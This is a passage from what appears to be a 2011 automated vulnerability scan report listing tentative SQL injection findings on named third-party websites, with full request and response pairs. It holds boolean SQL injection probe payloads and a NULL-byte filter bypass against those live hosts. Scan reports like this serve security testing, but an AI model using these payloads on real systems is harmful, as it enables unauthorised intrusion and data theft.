var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'></ul></div> "; document.write(string);var string ="<div onmouseover='showme();' onmouseout='hideme();' class='SubNav'><div id='submenu_active' ><ul style='width:550px' class='topsubnav' id='glam-menus-plus'><li class=''><a href='http://news.glam.com/' title='News'>News</a></li><li class=''><a href='http://style.glam.com/' title='Style'>Style</a></li><li class=''><a href='http://alist.glam.com/' title='A-List'>A-List</a></li></ul></div><style type='text/css'>._glam_search_button {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px 0; width: 55px; height: 20px;list-style:none} ._glam_search_twitter {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px -300px; width: 20px; height: 20px;} ._glam_search_facebook {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -495px; width: 20px; height: 20px;} ._glam_search_rss {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -1935px; width: 20px; height: 20px;}</style> <div class='SocialContainer'id='menusearch'><div class='SearchBox'><form role='search' name='searchform' method='get' id='searchform' action='http://www.glam.com' ><div class='search_controls'><input type='text' style='height:15px;' value='' name='search' id='search' /></div><div style='float:left;margin-top:3px;'><span onclick='javascript:document.searchform.submit();' style='cursor:pointer'><div class='_glam_search_button'></div></span></div></div> <ul class='social'> <a href='http://twitter.com/onglamfashion' target='_blank'><div class='_glam_search_twitter'></div></a> <a href='http://www.facebook.com/pages/Glamcom/144180538945796?ref=ts' target='_blank'><div class='_glam_search_facebook'></div></a> <a href='http://celebrities.gl
...[SNIP]...

1.5. http://cr0.worthathousandwords.com/8/B0/97/12F97D19102C47E09DCCA28EA33.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cr0.worthathousandwords.com
Path:   /8/B0/97/12F97D19102C47E09DCCA28EA33.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /8/B0/97%20and%201%3d1--%20/12F97D19102C47E09DCCA28EA33.jpg?pid=5670.200&qs=yvF%5Boby1L%7C%2FOjugd%2FekwBYzxvkTmohuh5dts%29%7Dxs%3EMOSJE6INZHLL%27Dtssumhohk%29miz%3EMkduxodfxh%29M%5B!Xkf~vpu~%26Fxrzvqzlwk%27Tjxyrrn!Fro%2997!Xzd%7Diz!2%26Vrrjf%257%3CB%3B HTTP/1.1
Host: cr0.worthathousandwords.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/topic/What_Is_Hipaa?p=l&as=REDACTED&ac=529&kgl=38620759
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 2778
Cache-Control: private, max-age=3600
Date: Mon, 02 May 2011 15:28:29 GMT
Connection: close
Vary: Accept-Encoding

<html>
<head>
<title>The resource cannot be found.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-fami
...[SNIP]...
</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[HttpException]
at System.Web.CachedPathData.GetPhysicalPath(VirtualPath virtualPath)
at System.Web.CachedPathData.GetConfigPathData(String configPath)
at System.Web.CachedPathData.GetVirtualPathData(VirtualPath virtualPath, Boolean permitPathsOutsideApp)
at System.Web.HttpContext.GetFilePathData()
at System.Web.HttpContext.GetConfigurationPathData()
at System.Web.Configuration.RuntimeConfig.GetConfig(HttpContext context)
at System.Web.Configuration.CustomErrorsSection.GetSettings(HttpContext context, Boolean canThrow)
at System.Web.HttpResponse.ReportRuntimeError(Exception e, Boolean canThrow, Boolean localExecute)
at System.Web.HttpContext.ReportRuntimeErrorIfExists(RequestNotificationStatus& status)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->

Request 2

GET /8/B0/97%20and%201%3d2--%20/12F97D19102C47E09DCCA28EA33.jpg?pid=5670.200&qs=yvF%5Boby1L%7C%2FOjugd%2FekwBYzxvkTmohuh5dts%29%7Dxs%3EMOSJE6INZHLL%27Dtssumhohk%29miz%3EMkduxodfxh%29M%5B!Xkf~vpu~%26Fxrzvqzlwk%27Tjxyrrn!Fro%2997!Xzd%7Diz!2%26Vrrjf%257%3CB%3B HTTP/1.1
Host: cr0.worthathousandwords.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/topic/What_Is_Hipaa?p=l&as=REDACTED&ac=529&kgl=38620759
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 2720
Cache-Control: private, max-age=3600
Date: Mon, 02 May 2011 15:28:29 GMT
Connection: close
Vary: Accept-Encoding

<html>
<head>
<title>The resource cannot be found.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-fami
...[SNIP]...
</b>&nbsp;Microsoft .NET Framework Version:2.0.50727.3603; ASP.NET Version:2.0.50727.3082

</font>

</body>
</html>
<!--
[HttpException]
at System.Web.CachedPathData.GetConfigPathData(String configPath)
at System.Web.CachedPathData.GetVirtualPathData(VirtualPath virtualPath, Boolean permitPathsOutsideApp)
at System.Web.HttpContext.GetFilePathData()
at System.Web.HttpContext.GetConfigurationPathData()
at System.Web.Configuration.RuntimeConfig.GetConfig(HttpContext context)
at System.Web.Configuration.CustomErrorsSection.GetSettings(HttpContext context, Boolean canThrow)
at System.Web.HttpResponse.ReportRuntimeError(Exception e, Boolean canThrow, Boolean localExecute)
at System.Web.HttpRuntime.FinishRequest(HttpWorkerRequest wr, HttpContext context, Exception e)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->

1.6. http://cr0.worthathousandwords.com/8/B0/97/12F97D19102C47E09DCCA28EA33.jpg [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cr0.worthathousandwords.com
Path:   /8/B0/97/12F97D19102C47E09DCCA28EA33.jpg

Issue detail

The pid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the pid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /8/B0/97/12F97D19102C47E09DCCA28EA33.jpg?pid=5670.200%00'&qs=yvF%5Boby1L%7C%2FOjugd%2FekwBYzxvkTmohuh5dts%29%7Dxs%3EMOSJE6INZHLL%27Dtssumhohk%29miz%3EMkduxodfxh%29M%5B!Xkf~vpu~%26Fxrzvqzlwk%27Tjxyrrn!Fro%2997!Xzd%7Diz!2%26Vrrjf%257%3CB%3B HTTP/1.1
Host: cr0.worthathousandwords.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/topic/What_Is_Hipaa?p=l&as=REDACTED&ac=529&kgl=38620759
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 5181
Cache-Control: private, max-age=3600
Date: Mon, 02 May 2011 15:28:17 GMT
Connection: close
Vary: Accept-Encoding

<html>
<head>
<title>A potentially dangerous Request.QueryString value was detected from the client (qs=&quot;...!2&amp;Vrrjf%7&lt;B;&quot;).</title>
<style>
body {fon
...[SNIP]...
<b> Exception Details: </b>
...[SNIP]...
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>
...[SNIP]...

Request 2

GET /8/B0/97/12F97D19102C47E09DCCA28EA33.jpg?pid=5670.200%00''&qs=yvF%5Boby1L%7C%2FOjugd%2FekwBYzxvkTmohuh5dts%29%7Dxs%3EMOSJE6INZHLL%27Dtssumhohk%29miz%3EMkduxodfxh%29M%5B!Xkf~vpu~%26Fxrzvqzlwk%27Tjxyrrn!Fro%2997!Xzd%7Diz!2%26Vrrjf%257%3CB%3B HTTP/1.1
Host: cr0.worthathousandwords.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/topic/What_Is_Hipaa?p=l&as=REDACTED&ac=529&kgl=38620759
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: image/jpg
Content-Length: 4894
Cache-Control: private, max-age=3600
Date: Mon, 02 May 2011 15:28:18 GMT
Connection: close

......JFIF.....`.`.....C.......................

............................... "..".......C.....................................................................d.d.."..............................
...[SNIP]...

1.7. http://cr0.worthathousandwords.com/C/AE/42/DF69B0E03BBF9D28DDBF2CEA27A.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cr0.worthathousandwords.com
Path:   /C/AE/42/DF69B0E03BBF9D28DDBF2CEA27A.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /C/AE/42%20and%201%3d1--%20/DF69B0E03BBF9D28DDBF2CEA27A.jpg?pid=5670.200&qs=yvF%5Boby1L%7C%2FOjugd%2FekwB%7Dz%C2%802OQ3irv*%7BuqCKY%24%27!ftg%29LPQFG%29miz%3EQkd%7Br%27Ntxh%29Eipzz%23QMWBF%26Fxqwmngqli5!Wkdm%24%7Bij%26KY%24%5Einzh%29Thqjx%23Ws~%22 HTTP/1.1
Host: cr0.worthathousandwords.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/topic/What_Is_Hipaa?p=l&as=REDACTED&ac=529&kgl=38620759
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 2720
Cache-Control: private, max-age=3600
Date: Mon, 02 May 2011 15:28:17 GMT
Connection: close
Vary: Accept-Encoding

<html>
<head>
<title>The resource cannot be found.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-fami
...[SNIP]...
</b>&nbsp;Microsoft .NET Framework Version:2.0.50727.3603; ASP.NET Version:2.0.50727.3082

</font>

</body>
</html>
<!--
[HttpException]
at System.Web.CachedPathData.GetConfigPathData(String configPath)
at System.Web.CachedPathData.GetVirtualPathData(VirtualPath virtualPath, Boolean permitPathsOutsideApp)
at System.Web.HttpContext.GetFilePathData()
at System.Web.HttpContext.GetConfigurationPathData()
at System.Web.Configuration.RuntimeConfig.GetConfig(HttpContext context)
at System.Web.Configuration.CustomErrorsSection.GetSettings(HttpContext context, Boolean canThrow)
at System.Web.HttpResponse.ReportRuntimeError(Exception e, Boolean canThrow, Boolean localExecute)
at System.Web.HttpRuntime.FinishRequest(HttpWorkerRequest wr, HttpContext context, Exception e)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->

Request 2

GET /C/AE/42%20and%201%3d2--%20/DF69B0E03BBF9D28DDBF2CEA27A.jpg?pid=5670.200&qs=yvF%5Boby1L%7C%2FOjugd%2FekwB%7Dz%C2%802OQ3irv*%7BuqCKY%24%27!ftg%29LPQFG%29miz%3EQkd%7Br%27Ntxh%29Eipzz%23QMWBF%26Fxqwmngqli5!Wkdm%24%7Bij%26KY%24%5Einzh%29Thqjx%23Ws~%22 HTTP/1.1
Host: cr0.worthathousandwords.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/topic/What_Is_Hipaa?p=l&as=REDACTED&ac=529&kgl=38620759
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 2778
Cache-Control: private, max-age=3600
Date: Mon, 02 May 2011 15:28:17 GMT
Connection: close
Vary: Accept-Encoding

<html>
<head>
<title>The resource cannot be found.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-fami
...[SNIP]...
</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[HttpException]
at System.Web.CachedPathData.GetPhysicalPath(VirtualPath virtualPath)
at System.Web.CachedPathData.GetConfigPathData(String configPath)
at System.Web.CachedPathData.GetVirtualPathData(VirtualPath virtualPath, Boolean permitPathsOutsideApp)
at System.Web.HttpContext.GetFilePathData()
at System.Web.HttpContext.GetConfigurationPathData()
at System.Web.Configuration.RuntimeConfig.GetConfig(HttpContext context)
at System.Web.Configuration.CustomErrorsSection.GetSettings(HttpContext context, Boolean canThrow)
at System.Web.HttpResponse.ReportRuntimeError(Exception e, Boolean canThrow, Boolean localExecute)
at System.Web.HttpContext.ReportRuntimeErrorIfExists(RequestNotificationStatus& status)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->

1.8. https://customer.trizetto.com/OnyxCustomerPortal/home.asp [ASPSESSIONIDQSASBQTR cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://customer.trizetto.com
Path:   /OnyxCustomerPortal/home.asp

Issue detail

The ASPSESSIONIDQSASBQTR cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the ASPSESSIONIDQSASBQTR cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /OnyxCustomerPortal/home.asp HTTP/1.1
Host: customer.trizetto.com
Connection: keep-alive
Referer: https://customer.trizetto.com/OnyxCustomerPortal/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionData=OCPUserId=&UserAccessLevel=&CustomerType=&CompanyId=0&LangCode=&IndividualId=0; ocpDate=gsTimeFormat=hh%3Amm&gsDateFormat=yyyy%2FMM%2Fdd&gsTimeSeparator=%3A&gsDateSeparator=%2F&gsIs24Hour=1&gsDateOrder=YMD; __utmz=29614586.1304367986.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=29614586.1608591266.1304367986.1304367986.1304367986.1; __utmc=29614586; __utmb=29614586.6.10.1304367986; ASPSESSIONIDQSASBQTR=CEKFFMDDCFNNAGOMJMBNIEDJ'%20and%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 15:49:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 2392
Content-Type: text/html; Charset=UTF-8
Expires: Mon, 02 May 2011 15:49:33 GMT
Set-Cookie: CustPersist=; expires=Tue, 01-May-2012 06:00:00 GMT; path=/OnyxCustomerPortal
Set-Cookie: ASPSESSIONIDQSCTARTR=LENPHMDDGIMEPGCGEACILGDD; path=/
Cache-control: private



<HTML>

<HEAD>
   <meta http-equiv="content-type" content="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="main.css">
<TITLE>Customer Portal Home Page</TITLE>
</HEAD>

<BODY>

<table border="0" width="100%" cellspacing="0" cellpadding="5px" height="100%">
<tr>
<td class="LeftBorder" bgcolor="#002073" valign="top" width="160px">
   <table border="0" width="100%">
<tr>
       <td width="100%"><a CLASS='AdvancedSearchLink' href="about.asp">About Us</a></td>
</tr><tr>
       <td width="100%"><a CLASS='AdvancedSearchLink' href="customer/customer.asp">Update Profile</a></td>
</tr><tr>
       <td width="100%"><a CLASS='AdvancedSearchLink' href="incident/incidentList_support.asp">Support Requests</a></td>
</tr>
   <tr>
   <td width="100%" height="250">&nbsp;</td>
   </tr>
<TR>
<TD VALIGN="BOTTOM">
&nbsp;

</TD>
</TR>
   </table>
</td>

<td class="MainBody" bgcolor="#FFFFFF" valign="top">
<H2>Welcome!</H2>
Already registered? Please <A HREF='login.asp'>login.</A><BR><BR>
If you don't have a login to the TriZetto Customer Support Interface and would like one, please contact your TriZetto Customer Support Representative.<BR>

<BR><BR>
<align="center"><B><FONT SIZE=4><B>Onyx Use Agreement</B></FONT></B>
<BR><BR>
<width="95%" align="left">You may now attach documents to your support request. Since attachments that you submit may contain protected health information (PHI) or other confidential or proprietary information, TriZetto is requiring that you use a unique user ID and a strong password when accessing ONYX. Do not share your user ID or password with anyone else.<BR><BR>TriZetto&rsquo;s password policy requires that a strong passwo
...[SNIP]...

Request 2

GET /OnyxCustomerPortal/home.asp HTTP/1.1
Host: customer.trizetto.com
Connection: keep-alive
Referer: https://customer.trizetto.com/OnyxCustomerPortal/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionData=OCPUserId=&UserAccessLevel=&CustomerType=&CompanyId=0&LangCode=&IndividualId=0; ocpDate=gsTimeFormat=hh%3Amm&gsDateFormat=yyyy%2FMM%2Fdd&gsTimeSeparator=%3A&gsDateSeparator=%2F&gsIs24Hour=1&gsDateOrder=YMD; __utmz=29614586.1304367986.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=29614586.1608591266.1304367986.1304367986.1304367986.1; __utmc=29614586; __utmb=29614586.6.10.1304367986; ASPSESSIONIDQSASBQTR=CEKFFMDDCFNNAGOMJMBNIEDJ'%20and%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 15:49:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 2392
Content-Type: text/html; Charset=UTF-8
Expires: Mon, 02 May 2011 15:49:34 GMT
Set-Cookie: CustPersist=; expires=Tue, 01-May-2012 06:00:00 GMT; path=/OnyxCustomerPortal
Cache-control: private



<HTML>

<HEAD>
   <meta http-equiv="content-type" content="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="main.css">
<TITLE>Customer Portal Home Page</TITLE>
</HEAD>

<BODY>

<table border="0" width="100%" cellspacing="0" cellpadding="5px" height="100%">
<tr>
<td class="LeftBorder" bgcolor="#002073" valign="top" width="160px">
   <table border="0" width="100%">
<tr>
       <td width="100%"><a CLASS='AdvancedSearchLink' href="about.asp">About Us</a></td>
</tr><tr>
       <td width="100%"><a CLASS='AdvancedSearchLink' href="customer/customer.asp">Update Profile</a></td>
</tr><tr>
       <td width="100%"><a CLASS='AdvancedSearchLink' href="incident/incidentList_support.asp">Support Requests</a></td>
</tr>
   <tr>
   <td width="100%" height="250">&nbsp;</td>
   </tr>
<TR>
<TD VALIGN="BOTTOM">
&nbsp;

</TD>
</TR>
   </table>
</td>

<td class="MainBody" bgcolor="#FFFFFF" valign="top">
<H2>Welcome!</H2>
Already registered? Please <A HREF='login.asp'>login.</A><BR><BR>
If you don't have a login to the TriZetto Customer Support Interface and would like one, please contact your TriZetto Customer Support Representative.<BR>

<BR><BR>
<align="center"><B><FONT SIZE=4><B>Onyx Use Agreement</B></FONT></B>
<BR><BR>
<width="95%" align="left">You may now attach documents to your support request. Since attachments that you submit may contain protected health information (PHI) or other confidential or proprietary information, TriZetto is requiring that you use a unique user ID and a strong password when accessing ONYX. Do not share your user ID or password with anyone else.<BR><BR>TriZetto&rsquo;s password policy requires that a strong password consist of at least eight (8) characters and contain three of th
...[SNIP]...

1.9. http://designers.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://designers.glam.com
Path:   /wp-content/plugins/menus-plus/javascriptmenu.php

Issue detail

The menu parameter appears to be vulnerable to SQL injection attacks. The payloads 83147941%20or%201%3d1--%20 and 83147941%20or%201%3d2--%20 were each submitted in the menu parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=183147941%20or%201%3d1--%20 HTTP/1.1
Host: designers.glam.com
Proxy-Connection: keep-alive
Referer: http://designers.glam.com/2011/04/29/royal-wedding-style-what-the-guests-wore/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; __utmc=234602824; bkpix2=1; qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; __utmb=234602824

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Mon, 02 May 2011 06:11:15 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
X-Varnish: 1026486407
Expires: Mon, 02 May 2011 13:11:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 13:11:18 GMT
Connection: close
Set-Cookie: PHPSESSID=qlmggolkpba4dpioent2dkb0u3; path=/
Content-Length: 21163

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://fashion.glam.com/' title='Fashion' style='color:white' onmouseover='showSubMenu(4)' onmouseout='hideSubMenu();' >Fashion</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://trends.glam.com/' title='Trends' onmouseover='showSubMenu(5)' onmouseout='hideSubMenu();'>Trends</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://runway.glam.com/' title='Runway' onmouseover='showSubMenu(6)' onmouseout='hideSubMenu();'>Runway</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://designers.glam.com/' title='Designers' style='color:white' onmouseover='showSubMenu(7)' onmouseout='hideSubMenu();' >Designers</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://shopping.glam.com/' title='Shopping' onmouseover='showSubMenu(8)' onmouseout='hideSubMenu();'>Shopping</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://beauty.glam.com/' title='Beauty' onmouseover='showSubMenu(9)' onmouseout='hideSubMenu();'>Beauty</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://hair.glam.com/' title='Hair' onmouseover='showSubMenu(10)' onmouseout='hideSubMenu();'>Hair</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://makeup.glam.com/' title='Makeup' onmouseover='showSubMenu(11)' onmouseout='hideSubMenu();'>Makeup</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://skinbody.glam.com/' title='Skin &amp;
...[SNIP]...

Request 2

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=183147941%20or%201%3d2--%20 HTTP/1.1
Host: designers.glam.com
Proxy-Connection: keep-alive
Referer: http://designers.glam.com/2011/04/29/royal-wedding-style-what-the-guests-wore/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; __utmc=234602824; bkpix2=1; qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; __utmb=234602824

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Mon, 02 May 2011 13:11:20 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
X-Varnish: 1026486573
Expires: Mon, 02 May 2011 13:11:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 13:11:20 GMT
Connection: close
Set-Cookie: PHPSESSID=plo52m9qp2ib1qmtvfoeulgfn4; path=/
Content-Length: 2517

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'></ul></div> "; document.write(string);var string ="<div onmouseover='showme();' onmouseout='hideme();' class='SubNav'><div id='submenu_active' ><ul style='width:550px' class='topsubnav' id='glam-menus-plus'><li class=''><a href='http://trends.glam.com/' title='Trends'>Trends</a></li><li class=''><a href='http://runway.glam.com/' title='Runway'>Runway</a></li><li class=''><a href='http://designers.glam.com/' title='Designers' style='color:#D94275'>Designers</a></li><li class=''><a href='http://shopping.glam.com/' title='Shopping'>Shopping</a></li><li class=''><a href='http://fwi.glam.com/' title='Fashion Week Insider'>Fashion Week Insider</a></li></ul></div><style type='text/css'>._glam_search_button {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px 0; width: 55px; height: 20px;list-style:none} ._glam_search_twitter {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 